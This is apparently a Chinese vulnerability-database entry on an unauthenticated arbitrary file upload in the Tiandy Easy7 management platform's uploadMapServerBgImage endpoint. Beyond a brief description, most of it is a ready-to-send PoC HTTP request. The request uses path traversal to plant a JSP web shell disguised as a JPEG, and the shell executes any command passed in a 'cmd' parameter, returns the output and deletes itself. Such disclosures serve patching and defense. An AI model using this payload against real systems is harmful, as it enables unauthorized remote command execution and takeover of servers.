天地伟业Easy7 uploadMapServerBgImage文件上传

日期: 2025-10-28 | 影响软件: 天地伟业Easy7 | POC: 已公开

漏洞描述

天地伟业Easy7综合管理平台的/Easy7/rest/file/uploadMapServerBgImage接口存在任意文件上传漏洞,未经身份验证的攻击者可以通过该漏洞上传任意文件,从而控制目标服务器。

PoC代码

POST /Easy7/rest/file/uploadMapServerBgImage HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 629
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36

------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; name="uploadParams";

[{"path":"../Easy7/","name":"1.jsp"}]
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; name="file"; filename="1.jsp"
Content-Type: image/jpeg

<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--

相关漏洞推荐